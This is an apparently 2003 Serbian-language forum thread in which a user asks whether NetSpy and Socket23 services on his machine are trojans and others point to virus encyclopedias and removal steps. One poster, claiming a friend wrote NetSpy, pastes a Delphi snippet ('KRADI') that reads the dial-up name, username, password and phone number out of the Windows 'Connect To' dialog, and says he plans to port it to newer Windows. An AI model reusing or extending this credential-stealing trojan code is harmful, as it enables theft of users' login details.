MyCity » Zaštita od zlonamernih programa » Trojanci? Socket23 i NetSpy. Jesu ili nisu

Trojanci? Socket23 i NetSpy. Jesu ili nisu

Napisano na dan: 11.6.2003

Trojanci? Socket23 i NetSpy. Jesu ili nisu

Sledeća strana

Pagination

Odgovori

berag Poslao: 11 Jun 2003 10:18 Idi na vrh
offline berag Novi MyCity građanin Pridružio: 11 Jun 2003 Poruke: 1	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! NetCrunch mi je pri trazenju trojanaca pronasao dva servisa i to NetSpy i Socket23. Prvi je na portu 1025, a drugi na portu 5000. Na internetu sam pronasao nesto malo o njima i navodno su visoko rizicni. U opisanom postupku kako ih se rjesiti nema tih fajlova pa ne mogu ni da ih se rjesim. Molim one koji se razumiju, a ovdje bi ih trebalo biti, da napisu svoje misljenje, odgovor, pitanje, komentar.

Profil
Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.

Drax Poslao: 11 Jun 2003 11:21 Idi na vrh
offline Drax Pridružio: 20 Apr 2003 Poruke: 2091 Gde živiš: Novi Sad	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! evo da preduhitrim Puky-ja ;-) http://virus.neobee.net/ pa pogledaj tamo.

Profil

MilanO Poslao: 11 Jun 2003 12:02 Idi na vrh
offline MilanO Ugledni građanin Pridružio: 17 Apr 2003 Poruke: 488 Gde živiš: Niš	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Potrazi na: http://www.viruslist.com/eng/viruslist.html ili http://www.trendmicro.com/vinfo/virusencyclo

Profil

Puky Poslao: 11 Jun 2003 18:35 Idi na vrh
offline Puky Scottish rebel Pridružio: 18 Apr 2003 Poruke: 5815 Gde živiš: u Zmajevom gnjezdu	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Drax ::evo da preduhitrim Puky-ja ;-) http://virus.neobee.net/ pa pogledaj tamo. TNX za antireklamu jer nemam te opise na sajtu. @ Berag Zapamti koji su to fajlovi pa pogledaj u listi procesa pa ih iskljuci. A dodatno pogledaj u registartskoj bazi da li se startuju.

Profil

weB_KiLeR Poslao: 21 Jun 2003 11:41 Idi na vrh
offline weB_KiLeR Građanin Pridružio: 21 Jun 2003 Poruke: 65 Gde živiš: Serbia/Pancevo	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! berag ::NetCrunch mi je pri trazenju trojanaca pronasao dva servisa i to NetSpy i Socket23. Prvi je na portu 1025, a drugi na portu 5000. Na internetu sam pronasao nesto malo o njima i navodno su visoko rizicni. U opisanom postupku kako ih se rjesiti nema tih fajlova pa ne mogu ni da ih se rjesim. Molim one koji se razumiju, a ovdje bi ih trebalo biti, da napisu svoje misljenje, odgovor, pitanje, komentar. Joj netspy to je programirao moj ortak i ja sam hteo da izbacim koji trojan ali posto je izasao win2k i XP malo su se neke stvari promenile pa me je mrzelo da otkrivam gde drzi dial up passworde dok je kod win98 sve bilo lako samo izvadis handle iz prozora i povadis text iz field-ova prosto ko pasulj... Citat: function KRADI(hChild: hWnd; param: dWord): bool; stdcall; var tmp: pchar; tmp2: string; begin getmem(tmp, 1025); SendMessage(hChild, WM_GETTEXT, 1024, longint(tmp)); tmp2 := StrPas(tmp); case brojac of DUP_NAME: STOLEN_DIALUP := tmp2; DUP_USER: STOLEN_USER := tmp2; DUP_PASS: STOLEN_PASS := tmp2; DUP_PHONE: STOLEN_PHONE := tmp2; end; freemem(tmp, 1025); inc(brojac); end; i onda samo pozovete i napravite ako nadje prozor Connect to: Citat: wnd := FindWindow(nil, 'Connect To'); if iswindow(wnd)=true then begin repeat Waiting := 30; Brojac := 0; EnumChildWindows(wnd, @KRADI, 0); CurData := STOLEN_DIALUP+':'+STOLEN_USER+':'+STOLEN_PASS+':'+STOLEN_PHONE; Uglavnom ocajno bedan security :-)

Profil

Peca Poslao: 21 Jun 2003 12:14 Idi na vrh
offline Peca Glavni Administrator Predrag Damnjanović SysAdmin i programer Pridružio: 17 Apr 2003 Poruke: 23211 Gde živiš: Niš	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! cini mi se da je to na weird-ovom sajtu bilo, pre 3-4 godina... mislim da ovo ne radi na novijim windowsima, na XP recimo

Profil

weB_KiLeR Poslao: 21 Jun 2003 14:02 Idi na vrh
offline weB_KiLeR Građanin Pridružio: 21 Jun 2003 Poruke: 65 Gde živiš: Serbia/Pancevo	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Ma to je bilo svugde nije ni vazno pa ne radi na win2k i XP-u zato sto passworde drze negde drugde cim izvalim gde radice

Profil

MyCity » Zaštita od zlonamernih programa » Trojanci? Socket23 i NetSpy. Jesu ili nisu

Ko je trenutno na forumu

Ukupno su 859 korisnika na forumu :: 7 registrovanih, 0 sakrivenih i 852 gosta :: [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:: Korisnici trenutno na forumu: _Rade, draggan, Koridor, opt1, Shilok, simazr, zlaya011

Svaki korisnik ovog sajta je odgovoran za sadržaj svoje poruke koju objavi na sajtu. Sajt se odriče svake odgovornosti za sadržaj tih poruka.
Postavljanjem vaše poruke ili vašeg autorskog dela na ovaj sajt, saglasni ste da ovaj sajt postaje distributer vašeg dela, i odričete se mogućnosti njegovog povlačenja ili brisanja, bez saglasnosti uprave sajta.
Distribucija sadržaja sa ovog sajta je dozvoljena samo u nekomercijalne svrhe, uz obaveznu napomenu da je sadržaj preuzet sa ovog sajta, i uz obavezno navođenje adrese MyCity sajta. Za sve ostale vidove distribucije obavezni ste da prethodno zatražite odobrenje od vlasnika MyCity sajta.
MyCity pokrenuo, administrira i razvija Predrag Damnjanović, a o uređenju sajta se brine MyCity Tim.
Ukoliko želite da nas kontaktirate kliknite ovde.
Naši sajtovi:
Vesti, Vojni forum, Zaštita od virusa, TekstPesme.rs

This content is licensed under a Creative Commons License.
Based on phpBB 2, translated by Simke, designed by